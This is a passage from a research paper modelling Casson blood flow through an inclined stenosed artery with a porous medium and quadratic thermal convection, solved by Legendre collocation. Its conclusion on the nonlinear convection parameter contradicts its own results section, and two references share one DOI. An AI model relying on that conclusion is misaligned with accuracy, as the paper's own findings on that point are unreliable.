}}$$ is the Darcy–Forchheimer's term, $$\\tilde{u}$$, $$\\tilde{v}$$, and $$\\tilde{w}$$ are the velocity components in the radial and axial directions, respectively. $$\\sigma_{1}$$ is the electrical conductivity, $$k$$ is the thermal conductivity, and $$C_{{\\text{p}}}$$ is the specific heat at constant pressure. The differential equation for the radiative flux $$q_{{\\text{r}}}$$ is given in the following equation:\n\n$$\\frac{{\\partial^{2} q_{{\\text{r}}} }}{{\\partial \\tilde{r}^{2} }} - 3\\alpha_{v}^{2} q_{{\\text{r}}} - 16\\alpha_{v} \\sigma T^{3} \\frac{\\partial T}{{\\partial \\overset{\\lower0.5em\\hbox{\\smash{\\scriptscriptstyle\\smile}}}{r} }} = 0,$$\n(5)\n\nwhere $$\\sigma$$ is the Stefan–Boltzmann constant. With the assumption of thin blood, $$\\alpha_{v} { \\ll }1.$$ Then, $$T_{0}$$ is the blood temperature at the stenosed region and T is the local temperature of the blood, then (5) can be solved to\n\n$$\\frac{{\\partial q_{{\\text{r}}} }}{{\\partial \\tilde{r}}} = 4\\alpha_{v}^{2} \\left( {T - T_{0} } \\right),$$\n(6)\n\nThe variable viscosity of the flow of blood is expressed by the formula:\n\n$$\\mu \\left( {\\tilde{r}} \\right) = \\mu_{0} (\\lambda h\\left( {\\tilde{r}} \\right) + 1),$$\n(7)\n\nwhere $$h\\left( {\\tilde{r}} \\right) = H\\left[ {1 - \\left( {\\frac{{\\tilde{r}}}{{d_{0} }}} \\right)^{m} } \\right]$$ and $$H_{r} = \\lambda H$$ in which $$\\lambda$$ is having a numerical value of 2.5 and H is the maximum hematocrit at the center of the artery, $$m$$ is the parameter that decides the exact shape of the blood velocity profile and $$H_{r}$$ is the hematocrit parameter. The geometry illustration of the stenosis located at the point, $$z$$ with its maximum height, $$\\delta$$ is defined by the following formula:\n\n$$h\\left( {\\tilde{z}} \\right) = \\left[ {1 - \\eta \\left( {b^{n - 1} \\left( {\\tilde{z} - a} \\right) - \\left( {\\tilde{z} - a} \\right)^{n} } \\right)} \\right]d\\left( {\\tilde{z}} \\right),\\quad {\\text{where}}\\;a \\le \\tilde{z} \\le a + b,\\quad h\\left( {\\tilde{z}} \\right) = d\\left( {\\tilde{z}} \\right),\\,\\,{\\text{otherwise}},$$\n(8)\n\nwhere $$d\\left( {\\tilde{z}} \\right)$$ is the radius of the narrow artery in the stenotic region with $$d\\left( {\\tilde{z}} \\right) = d_{0} + \\xi \\widetilde{z,}$$ In (8), n is the shape parameter which determines the shape of the constriction profile. The value $$n = 2$$ results in symmetrically shaped stenosis, and for nonsymmetric stenosis case $$n$$ considers the values $$n \\ge 2$$. $$\\xi$$ is the narrowed parameter defined by $$\\xi = {\\text{tan}}\\varphi$$, where $$\\varphi$$ is known as narrowed artery and $$\\xi$$ as the narrowing parameter which is defined by the case of converging, and $$d_{0}$$ is the radius of the non-narrowed artery.\n\nThe parameter $$\\eta$$ is defined as\n\n$$\\eta = \\frac{{\\delta^{*} n^{{\\frac{n}{n - 1}}} }}{{d_{0} b^{n} \\left( {n - 1} \\right)}}$$\n(9)\n\nwhere $$\\delta$$ is the maximum height of the stenosis located at\n\n$$\\tilde{z} = a + \\frac{b}{{n^{{\\frac{n}{n - 1}}} }}.$$\n(10)\n\n## Method of solution\n\nTo non-dimensionalize the obtained governing equations, we introduce the non-dimensional variables as follows:\n\n$$\\begin{gathered} \\;\\tilde{u} = \\frac{{uu_{0} \\delta }}{b},\\;\\;\\tilde{r} = rd_{0\\;} ,\\;\\;\\tilde{z} = zb\\;,\\;\\;\\tilde{v} = wu_{0\\;} ,\\;\\;\\tilde{h} = hd_{0} ,\\;\\;\\tilde{P} = \\frac{{u_{0} b\\mu_{0} p}}{{d_{0}^{2} }}\\;, \\hfill \\\\ {\\text{Re}} = \\;\\frac{{\\rho bu_{0} }}{{\\mu_{0} }},\\,\\,\\theta = \\frac{{T - T_{0} }}{{T_{0} }},\\,\\,\\;\\Pr = \\frac{{\\mu c_{p} }}{k},\\;\\,\\,{\\text{Ec}} = \\frac{{\\mu_{0}^{2} }}{{c_{{pT_{0} }} }},\\;\\,\\,Z = \\frac{{k_{1} }}{{d_{0}^{2} }}\\;, \\hfill \\\\ M = \\frac{{\\sigma_{1} H_{0}^{2} d_{0}^{2} }}{{\\mu_{0} }}\\;,\\;\\,\\,Q = A\\frac{{d_{0}^{2} }}{K}\\;,\\;\\,G_{r} = \\frac{{g\\alpha d_{0}^{3} T_{0} }}{{v^{2} }},\\,\\;N^{2} = \\frac{{4d_{0}^{2} \\alpha_{v}^{2} }}{k}\\;,\\,\\,G_{{\\text{N}}} = \\frac{{\\alpha_{2} }}{{\\alpha_{1} }}T_{0} . \\hfill \\\\ \\end{gathered}$$\n(11)\n\nwhere $$\\Pr ,\\;Z\\;,\\;N\\;,\\;{\\text{Re}} \\;,\\;\\theta ,\\;Z\\;\\;{\\text{Gr}}{\\kern 1pt} \\;M\\;,\\;{\\text{Ec}}\\;{\\text{and}}\\;\\;G_{{\\text{N}}},$$ respectively, represent the Prandtl number, porosity parameter, radiation absorption parameter, Reynolds number, temperature parameter, Grashof number, magnetic field parameter, Eckert number, and nonlinear thermal convection. In the case of aortic stenosis $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$ and the other additional conditions,\n\n$${\\text{Re}} \\frac{{\\delta^{*} n^{{\\frac{1}{n - 1}}} }}{b} \\ll 1,$$\n(12)\n\nassuming the following approximation:\n\n$$\\frac{{d_{0\\;} n^{{\\frac{1}{n - 1}}} }}{b}\\; \\sim \\;O\\left( 1 \\right),$$\n(13)\n\nTo non-dimensionalize the continuity equation, we substitute the non-dimensional quantities in (11) into (1) to obtain:\n\n$$\\frac{{u_{0} \\delta }}{{bd_{0} }}\\frac{\\partial u}{{\\partial r}} + \\frac{{uu_{0} \\delta }}{{rbd_{0} }} + \\frac{{u_{0} }}{b}\\frac{\\partial w}{{\\partial z}} = 0,$$\n(14)\n\nSince $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$,\n\n$$\\frac{{u_{0} }}{b}\\frac{\\partial w}{{\\partial z}} = 0,$$\n(15)\n$$\\frac{\\partial w}{{\\partial z}} = 0.$$\n(16)\n\nTo non-dimensionalize the momentum equation ($$r$$-direction), substitute (11) into (2) to obtain:\n\nAlso, since $$\\frac{\\delta }{{d_{0} }}{ \\ll }1$$, $$\\frac{\\partial w}{{\\partial z}} = 0$$,\n\n$$- \\frac{{u_{0} b\\mu_{0} }}{{d_{0}^{3} }}\\frac{\\partial p}{{\\partial z}} = 0,$$\n(17)\n$$\\frac{\\partial p}{{\\partial z}} = 0.$$\n(18)\n\nAlso, substituting the non-dimensional variables in (11) and (7) into the momentum equation (z-direction):\n\n\\begin{aligned} \\frac{\\partial p}{{\\partial z}} & = \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {H_{r} \\left( {\\frac{1}{r} - r^{m - 1} \\left( {m + 1} \\right)} \\right)} \\right]\\frac{\\partial w}{{\\partial r}} + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\frac{{\\partial^{2} w}}{{\\partial r^{2} }}wM^{2} \\\\ & \\quad + G_{r} \\left[ {\\theta + G_{{\\text{N}}} \\theta^{2} } \\right]\\cos \\gamma \\; - w\\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{H_{r} }}{Z}\\left( {1 - r^{m} } \\right) - \\frac{{b^{*} w^{2} d_{0}^{2} }}{{k_{1} }}, \\\\ \\end{aligned}\n(19)\n\nwhere $$G_{N} = \\frac{{\\alpha_{2} T_{0} }}{{\\alpha_{1} }}$$ is the nonlinear thermal convection.\n\nAlso, using the non-dimensional variables in Eq. (11), the energy equation becomes\n\n$$\\frac{1}{r}\\frac{\\partial }{\\partial r}\\left( {r\\frac{\\partial \\theta }{{\\partial r}}} \\right) + \\;{\\text{Ec}}\\Pr \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\left( {\\frac{\\partial w}{{\\partial r}}} \\right)^{2} - N^{2} \\theta = 0,$$\n(20)\n\nwhere $$B_{r} = \\;{\\text{Ec}}\\Pr$$ Brinkman number ($$B_{r}$$) is a dimensionless number used to study viscous flow. The corresponding boundary conditions are\n\n$$\\;\\frac{\\partial \\theta }{{\\partial r}} = 0,\\;\\,\\,\\,\\frac{\\partial w}{{\\partial r}} = 0,\\;\\;\\;\\;at\\;\\;r = 0,$$\n(21)\n\nand the no-slip boundary conditions (assuming that at a solid boundary, the fluid will have zero velocity relative to the boundary) at the artery wall\n\n$$\\;w = 0,\\,\\,\\,\\theta = 0,\\quad {\\text{at}}\\;\\;r = h\\left( z \\right),$$\n(22)\n\nwhere h(z) is defined by\n\n$$\\begin{gathered} h(z) = \\left( {1 + \\xi^{\\prime } z} \\right)\\left[ {1 - \\eta_{1} \\left( {(z - a^{\\prime } ) - (z - a^{\\prime } )^{n} } \\right)} \\right], \\hfill \\\\ \\;\\;{\\text{where}}\\;a^{\\prime } \\le z \\le a^{\\prime } + 1 \\hfill \\\\ \\end{gathered}.$$\n(23)\n\nWith the use of the Legendre collocation method, we have to define some functions. Let $$P_{n} (x)$$ be the Legendre polynomial function of degree $$n$$. We recall that $$P(x)$$ is the solution (eigenfunction) of the Sturm–Liouville problem as follows:\n\n\\begin{aligned} & \\left[ {\\left( {1 - x^{2} } \\right)P_{n}^{^{\\prime}} \\left( x \\right)} \\right]^{^{\\prime}} + n\\left( {n + 1} \\right)p_{n} \\left( x \\right) = 0, \\\\ & x \\in \\left[ { - 1,1} \\right],\\;n = 0,1,2,3, \\ldots \\\\ \\end{aligned}.\n(24)\n\nEquation (24) satisfies the recursive relations:\n\n$$P_{0} \\left( x \\right) = 1\\;,\\;P_{1} \\left( x \\right) = x\\;,\\;P_{2} \\left( x \\right) = \\frac{1}{2}\\left( {3x^{2} - 1} \\right),$$\n(25)\n$$P_{n} \\left( x \\right) = \\;\\frac{2n - 1}{n}\\;x\\;P_{n - 1} \\left( x \\right) - \\;\\frac{n - 1}{n}P_{n - 2} \\left( x \\right)\\;\\;;n \\ge 1,$$\n(26)\n\nThe set of Legendre polynomials from a [− 1,1] orthogonal set is\n\n$$\\int_{ - 1}^{1} P_{n} \\left( x \\right)P_{m} \\left( x \\right)\\;w\\left( x \\right){\\text{d}}x = \\;\\frac{2}{2n + 1}\\delta_{m,n} ,$$\n(27)\n\nwhere $$\\delta_{m,n}$$ is the Kronecker delta function. To apply the Legendre polynomial to the problem with a semi-infinite domain, we introduce algebraic mapping\n\n$$x = \\frac{2\\varsigma }{h} - 1,[ - 1,1] \\to [0,h],$$\n(28)\n\nthe boundary value problem is solved within the region [0, $$h$$] in place of [0,$$\\infty$$), whereas the scaling parameter is taken to be sufficiently large enough to evaluate the thickness of the boundary layer. Therefore, the real solutions $$f\\left( \\varsigma \\right)$$ and $$\\theta \\left( \\varsigma \\right)$$ are expressed as the basis of the Legendre polynomial function as\n\n$$f\\left( \\varsigma \\right) = \\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( \\varsigma \\right),\\;\\;\\,\\,\\theta \\left( \\varsigma \\right) = \\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( \\varsigma \\right),\\,\\,\\,{\\text{for}}\\quad j = 0,1,2,3, \\ldots ,$$\n(29)\n\nHence,\n\n$$\\begin{gathered} f\\left( \\varsigma \\right) = a_{0} P_{0} \\left( \\varsigma \\right) + a_{1} P_{1} \\left( \\varsigma \\right) + a_{2} P_{2} \\left( \\varsigma \\right) + \\cdots , \\hfill \\\\ \\theta \\left( \\varsigma \\right) = b_{0} P_{0} \\left( \\varsigma \\right) + b_{1} P_{1} \\left( \\varsigma \\right) + b_{2} P_{2} \\left( \\varsigma \\right) + \\cdots , \\hfill \\\\ \\end{gathered}$$\n(30)\n\nwhere $$P_{0} \\left( \\varsigma \\right)$$, $$P_{1} \\left( \\varsigma \\right)$$, $$P_{2} \\left( \\varsigma \\right)$$,…,$$P_{n} \\left( \\varsigma \\right)$$ are generated from recursive relation in (26) and\n\n$$P_{0} \\left( \\varsigma \\right) = 1\\;,\\;P_{1} \\left( \\varsigma \\right) = \\varsigma \\;,\\;P_{2} \\left( \\varsigma \\right) = \\frac{1}{2}\\left( {3\\varsigma^{2} - 1} \\right), \\ldots$$\n(31)\n\nHence, substituting Eq. (31) into (30)\n\n$$f\\left( \\varsigma \\right) = a_{0} + a_{1} \\left( {\\frac{2\\varsigma }{h} - 1} \\right) + \\frac{{a_{2} }}{2}\\left[ {3\\left( {\\frac{2\\varsigma }{h} - 1\\;} \\right)^{2} - 1} \\right] + \\cdots ,$$\n(32)\n$$\\theta \\left( \\varsigma \\right) = b_{0} + b_{1} \\left( {\\frac{2\\varsigma }{h} - 1} \\right) + \\frac{{b_{2} }}{2}\\left[ {3\\left( {\\frac{2\\varsigma }{h} - 1\\;} \\right)^{2} - 1} \\right] + \\cdots ,$$\n(33)\n\nfor $$h = 6$$ and $$N = 6$$, Eqs. (3233) become\n\n$$f\\left( \\varsigma \\right) = a_{0} + \\frac{{a_{1} }}{6}\\left( { - 6 + 2\\varsigma } \\right) + \\frac{{a_{2} }}{6}\\left[ {6 - 6\\varsigma + \\varsigma^{2} } \\right] + \\cdots$$\n(34)\n$$\\theta \\left( \\varsigma \\right) = b_{0} + \\frac{{b_{1} }}{6}\\left( { - 6 + 2\\varsigma } \\right) + \\frac{{b_{2} }}{6}\\left[ {6 - 6\\varsigma + \\varsigma^{2} } \\right] + \\cdots$$\n(35)\n\nWe assumed that $$w(r)$$ and $$\\theta (r)$$ are the Legendre base trial functions, defined by\n\n$$w(z) = \\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2z}{h} - 1\\;} \\right),\\;\\theta (r) = \\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1\\;} \\right),$$\n(36)\n\nwhere $$a_{j}$$ and $$b_{j}$$ are constants to be determined and $$P_{j} \\left( {\\frac{2r}{h} - 1} \\right)$$ is the shifted Legendre function from $$[ - 1,1]$$ to $$[0,h]$$. Substituting (36) into the boundary conditions in (21) and (22), respectively, we have\n\n$$\\begin{array}{*{20}l} {\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = 0} = 0} \\hfill \\\\ \\end{array} ,\\;\\begin{array}{*{20}l} {\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = 0} = 0} \\hfill \\\\ \\end{array} ,$$\n(37)\n$$\\begin{array}{*{20}l} {\\left[ {\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = h\\left( z \\right)} = 0} \\hfill \\\\ \\end{array} ,\\;\\begin{array}{*{20}l} {\\left[ {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right]_{r = h\\left( z \\right)} = 0} \\hfill \\\\ \\end{array} ,$$\n(38)\n\nResidues $$D_{w} \\left( {r,a_{j} ,b_{j} } \\right)$$ and $$D_{\\theta } \\left( {r,a_{j} ,b_{j} } \\right)$$ are derived from the above (39) and (40) accordingly.\n\nThe residues are minimized close to zero using the collocation method as follows:\n\n$$\\begin{array}{*{20}l} {{\\text{for}}\\;\\delta \\left( {r - r_{j} } \\right) = \\left\\{ {\\begin{array}{*{20}c} {1,} & {t = t_{j} } \\\\ {0,} & {{\\text{otherwise}},} \\\\ \\end{array} } \\right.} \\hfill \\\\ \\end{array}$$\n$$\\begin{array}{*{20}l} {\\int_{0}^{1} D_{w} \\delta \\left( {r - r_{j} } \\right){\\text{d}}r = D_{f} \\left( {r_{j} ,a_{k} ,b_{k} } \\right) = 0,\\;\\;\\;{\\text{for}}\\;j = 1,\\;2, \\ldots N - 1} \\hfill \\\\ \\end{array}$$\n(39)\n$$\\begin{array}{*{20}l} {\\int_{0}^{1} D_{\\theta } \\delta \\left( {r - r_{j} } \\right)dr = D_{\\theta } \\left( {r_{j} ,a_{k} ,b_{k} } \\right) = 0,\\;\\;\\;{\\text{for}}\\;j = 1,\\;2,..N - 1} \\hfill \\\\ \\end{array}$$\n(40)\n\nThe above procedure sought the unknown constant coefficients $$a_{j} ,$$ and $$b_{j}$$ which are then substituted in Eq. (36) as the required solution.\n\n## Results and discussion\n\nMathematica 11.3 is used to obtain the numerical results for the temperature and velocity variation. The parameters used include the inclination of the angle $$\\left( \\gamma \\right)$$ of the artery, Casson parameter $$\\left( \\beta \\right)$$, porosity parameter $$\\left( Z \\right)$$, the height of the stenosis $$\\left( \\delta \\right)$$, Darcy–Brinkman–Forchheimer term $$\\left( {F_{s} } \\right)$$, and nonlinear thermal convection term $$\\left( {G_{{\\text{n}}} } \\right)$$. The following various parameters were used in the plotting of the graphs.$$z = 0.5,\\delta = 0.1,N = 1.5,$$$$\\gamma = \\frac{\\pi }{3},a = 0.25,b = 1,\\xi = 0.002,{\\text{Ec}} = 1,P_{r} = 2,{\\text{Gr}} = 2,$$$$n = 2,h = 0.92,\\frac{\\partial P}{{\\partial z}} = 3,$$$$H_{r} = 1 {\\text{and}} d_{0} = 1$$.\n\nFigure 2a shows the effects of variation of inclination angle ($$\\gamma$$) parameters on the velocity profile. There is an increase in the velocity of the blood flow in the artery as the angle of inclination ($$\\gamma$$) values increase.\n\nFigure 2b displays the graphical features of the introduced nonlinear thermal convection parameter ($$G_{N}$$) on the velocity profile. It is seen from Fig. 2b that the velocity profile decreases with the increasing values of the nonlinear thermal convection parameter ($$G_{N}$$). Figure 2c depicts the effect of the scale of the Casson parameter (β); it shows that as it increases from 0.2 to 1.0, velocity increases at the arterial wall.\n\nFigure 3a shows the effects of variation of the inclination angle parameter (γ), on the temperature profile. There is an increase in the temperature of the blood flow in the artery as the inclination angle ($$\\gamma$$) values increase.\n\nFrom Fig. 3b, it is clear that as the value of the nonlinear thermal convection parameter increases, the temperature profile decreases, respectively. It is observed through these figures that velocity and temperature achieve their maximum value at the wall of the artery and attain the minimum value at the middle of the artery for the nonlinear thermal convection parameter. From Fig. 3c, it is seen that as the value of the Casson parameter (β) increases, the temperature profile decreases at the arterial wall and this takes place maybe because of the viscous nature of the fluid which decreases with increasing values of temperature.\n\n## Conclusion\n\nIn this paper, we studied the Casson rheological flow of blood in an inclined stenosed artery with a non-Darcian porous medium and quadratic thermal convection. The collocation method with Legendre polynomial basis functions was used to solve the nonlinear governing equations. From the velocity and temperature profiles, it concluded that: (i) as the angle of inclination parameter (γ) increases both the blood flow velocity and temperature increase, (ii) with an increase in the value of nonlinear thermal convection parameter (Gn) the velocity and the temperature of the blood flow also increase, and (iii) the increase in Casson parameter (β) gives a decrease on both velocity and temperature of the blood flow.\n\nNot applicable.\n\n## Abbreviations\n\n$$\\tilde{u}$$, $$\\tilde{v}$$ and $$\\tilde{w}$$ :\n\nVelocity components in the $$r$$, $$\\theta$$, and $$z$$ directions\n\n$$\\rho$$ :\n\nVariable viscosity\n\n$$\\gamma$$ :\n\nInclined at the angle\n\n$$\\mu$$ :\n\nVariable viscosity\n\n$$L$$ :\n\nTube length\n\n$$q_{{\\text{r}}}$$ :\n\n$$M$$ :\n\nMagnetic field\n\n$$\\sigma_{1}$$ :\n\nElectrical conductivity\n\n$$k$$ :\n\nThermal conductivity\n\n$$C_{{\\text{p}}}$$ :\n\nSpecific heat at constant pressure\n\n$$T_{0}$$ :\n\nBlood temperature at the stenosed region\n\nT :\n\nLocal temperature of the blood\n\nH :\n\nMaximum hematocrit at the center of the artery\n\n$$H_{r}$$ :\n\nHematocrit parameter\n\n$$d\\left( {\\tilde{z}} \\right)$$ :\n\nRadius of the narrow artery in the stenotic region\n\n$$d_{0}$$ :\n\n$$\\delta$$ :\n\nMaximum height of the stenosis\n\n$$\\Pr$$ :\n\nPrandtl number\n\n$$Z\\;$$ :\n\nPorosity parameter\n\n$$N$$ :\n\n$${\\text{Re}}$$ :\n\nReynolds number\n\n$$\\theta$$ :\n\nDimensionless temperature parameter\n\n$${\\text{Gr}}$$ :\n\nGrashof number\n\n$${\\text{Ec}}$$ :\n\nEckert number\n\n$$G_{{\\text{N}}}$$ :\n\nNonlinear thermal convection parameter\n\n$$f$$ :\n\nDimensionless fluid velocity\n\n## References\n\n1. Abubakar, J.U., Gbedeyan, J.A., Ojo, J.B.: Steady blood flow through vascular stenosis under the influence of magnetic field. Centrepoint J. (Sci. Ed.) 25(1), 61–82 (2019)\n\n2. Abubakar, J.U., Adeoye, A.D.: Effects of radiative heat and magnetic field on blood flow in an inclined tapered stenosed porous artery. J. Taibah Univ. Sci. 14(1), 77–86 (2020). https://doi.org/10.1080/16583655.2019.1701397\n\n3. Akbarzedeh, P.: Pulsatile Magneto-hydrodynamic blood flows through porous blood vessels using a third grade non-newtonian fluids model. Comput. Methods Progr. Biomed. 126(3–19), 2016 (2016)\n\n4. Beckermann, C., Viskanta, R., Ramadhyani, S.: A numerical study of non-Darcian natural convection in a vertical enclosure filled with a porous medium. Numer. Heat Transf. 10, 557–570 (1986)\n\n5. Bhargava, R., Anwar, O., Rawat, S., Beg, T.A., Triphati, D.: Finite element study of transient pulsatile magneto-hemodynamic non-Newtonian flow and drug diffusion in a porous medium channel. J. Mech. Med. Biol. 12(14), 1250081 (2012)\n\n6. Bhatti, M.M., Abdelsalam, S.I.: Bio-inspired peristaltic propulsion of hybrid nanofluid flow with Tantalum (Ta) and Gold (Au) nanoparticles under magnetic effects. Waves Random Complex Med. (2021). https://doi.org/10.1080/17455030.2021.1998728\n\n7. Chaturani, P., Samy, R.P.: Pulsative flow of Casson’s fluid through stenosed arteries with applications to blood flow. Biorhelogy 23(5), 499–511 (1986)\n\n8. Elnaqeeb, T., Sheh, N.A., Mekheimer, K.S.: Hemodynamics characteristics of gold nanoparticle blood flow through a tapered stenosed vessel with variable nanofluid viscosity. BioNanoScience 9(2), 245–255 (2019)\n\n9. Guner, A., Yalcinbas, S.: Legendre collocation method for solving nonlinear differential equations. Math. Comput. Appl. 18(3), 521–530 (2013)\n\n10. Hayat, T., Haider, F., Muhammad, T., Alsaedi, A.: Darcy–Forchheimer flow with Cattaneo–Christov homogeneous-heterogeneous. PLoS ONE 12(2017), 1–18 (2017)\n\n11. Ikbar, M.A., Chakravarty, S., Kelvin, K.L., Wong, M.J., Mandal, P.K.: Unsteady response of non-newtonian blood flow through a stenosed artery in magnetic field. J. Comput. Appl. Math. 230(1), 243–259 (2009)\n\n12. Krishna, M.M.: Effect of heat and mass flux conditions on Magnetohydrodynamics flow of Casson fluid over a curved stretching surface (2019). https://doi.org/10.4028/www.scientific.net/DDF.392.29\n\n13. Krishna, M.M.: Numerical investigation on magnetohydrodynamics flow of Casson fluid over a deformable porous layer with slip conditions. Indian J. Phys. (2019). https://doi.org/10.1007/s12648-019-01668-4\n\n14. Mallawi, F., Alzaidy, J.F., Hafez, R.M.: Application of a Legendre collocation method to the space-time variable fractional-order advection-dispersion equation. J. Taibah Univ. Sci. 13, 2019 (2018)\n\n15. Mandal, P.K., Chakravarthy, S., Mandal, A., Amin, N.: Effect of the body acceleration on unsteady pulsatile flow of non-Newtonian fluid through a stenosed artery. Appl. Math. Comput. 189, 766–779 (2007)\n\n16. Mustafa, T.: Eyring-Powell fluid flow through a circular pipe and heat transfer: full solutions. Int. J. Numer. Meth. Heat Fluid Flow 30(11), 4765–4774 (2020). https://doi.org/10.1108/hff-12-2019-0925\n\n17. Poonam, Sharma, B.K., Kumawat, C., Vafai, K.: Computational biomedical simulations of hybrid nanoparticles (blood-mediated) transport in a stenosed and aneurysmal curved artery with heat and mass transfer: hematocrit dependent viscosity approach. Chem. Phys. Lett. 800, 139666 (2022)\n\n18. Sharma, B.K., Rishu Gandhi, M.M.: Bhatti, Entropy analysis of thermally radiating MHD slip flow of hybrid nanoparticles (Au–Al2O3/Blood) through a tapered multi-stenosed artery. Chem. Phys. Lett. 790, 139348 (2022). https://doi.org/10.1016/j.cplett.2022.139348\n\n19. Tripathi, B., Kumar, B.S.: MHD blood flow and heat transfer through an inclined porous stenosed artery with variable viscosity. J. Taibah Univ. Sci. 14(1), 77–86 (2019). https://doi.org/10.1080/16583655.2019.1701397\n\n20. Turkyilmazoglu, M.: Velocity slip and entropy generation phenomena in thermal transport through metallic porous channel. J. Non-Equilib. Thermodyn (2020). https://doi.org/10.1515/jnet-2019-0097\n\nNot applicable.\n\n## Funding\n\nIt was funded by authors.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nJUA and QAO formulate the model and JUA, QAO, KAB, and AMB solved the model, drew the graphs presented, discussed the results, and presented the conclusions. All authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to J. U. Abubakar.\n\n## Ethics declarations\n\n### Competing interests\n\nWe, the authors, declare that there are no competing interests.\n\n### Publisher's Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Appendix 1\n\n### Appendix 1\n\nAlso, on substituting (38) into the governing Eq. (20), we obtain\n\n\\begin{aligned} D_{w} : & = \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {H_{r} \\left( {\\frac{1}{r} - \\left( {m + 1} \\right)r^{m - 1} } \\right)} \\right]\\left[ {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right] + \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right]\\frac{{{\\text{d}}^{2} }}{{{\\text{d}}r^{2} }}\\left[ {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right] \\\\ & \\quad - \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)M^{2} + G_{r} \\left[ {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right) + G_{N} \\left( {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} } \\right]\\cos \\gamma \\; - \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right) \\\\ & \\quad + \\left( {1 + \\frac{1}{\\beta }} \\right)\\frac{{H_{r} }}{Z}\\left( {1 - r^{m} } \\right) - \\frac{{b^{*} \\left( {\\sum\\limits_{j = 0}^{N} b_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} d_{0}^{2} }}{{k_{1} }} - \\frac{{\\text{d}}}{{{\\text{d}}z}}\\sum\\limits_{j = 0}^{N} a_{j} P_{j} \\left( {\\frac{2z}{h} - 1} \\right), \\\\ \\end{aligned}\n(41)\n\\begin{aligned} D_{\\theta } : & = \\frac{1}{r}\\frac{{\\text{d}}}{{{\\text{d}}r}}\\left( {r\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right) + \\;E_{c} P_{r} \\left( {1 + \\frac{1}{\\beta }} \\right)\\left[ {1 + H_{r} \\left( {1 - r^{m} } \\right)} \\right] \\\\ & \\quad \\times \\left( {\\frac{{\\text{d}}}{{{\\text{d}}r}}\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right)^{2} - N^{2} \\left( {\\sum\\limits_{j = 0}^{N} c_{j} P_{j} \\left( {\\frac{2r}{h} - 1} \\right)} \\right). \\\\ \\end{aligned}\n(42)\n\n## Rights and permissions", null, "" ]
[ null, "https://joems.springeropen.com/track/article/10.1186/s42787-022-00157-8", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8287909,"math_prob":0.9998648,"size":23527,"snap":"2023-40-2023-50","text_gpt3_token_len":6142,"char_repetition_ratio":0.13276368,"word_repetition_ratio":0.06262864,"special_character_ratio":0.2653122,"punctuation_ratio":0.15373898,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999671,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T13:12:19Z\",\"WARC-Record-ID\":\"<urn:uuid:7affdebf-39f1-4982-8f82-1a1ca9889de2>\",\"Content-Length\":\"340751\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f9ca1121-cf2f-4d22-b74e-360924508675>\",\"WARC-Concurrent-To\":\"<urn:uuid:6d306f6b-6dfc-46e7-8f5c-e26f17110ea2>\",\"WARC-IP-Address\":\"146.75.32.95\",\"WARC-Target-URI\":\"https://joems.springeropen.com/articles/10.1186/s42787-022-00157-8\",\"WARC-Payload-Digest\":\"sha1:KA73MQCCODFM4DX36YCBT7AV7NG3EVC7\",\"WARC-Block-Digest\":\"sha1:U44TOUSYZRXFPEK5FU2FRBMRO7IWRTGS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100081.47_warc_CC-MAIN-20231129105306-20231129135306-00205.warc.gz\"}"}
https://mathschoolinternational.com/Physics-Books/Mechanics/Classical-Mechanics-2E--Tai-Chow.aspx
